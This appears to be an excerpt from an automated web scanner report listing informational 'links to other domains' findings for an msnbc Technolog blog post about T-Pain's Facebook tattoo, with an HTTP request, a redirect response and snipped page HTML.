<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.344. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=298
Date: Sat, 29 Jan 2011 23:51:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64820

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942663&amp;rand=1645153984&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.345. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

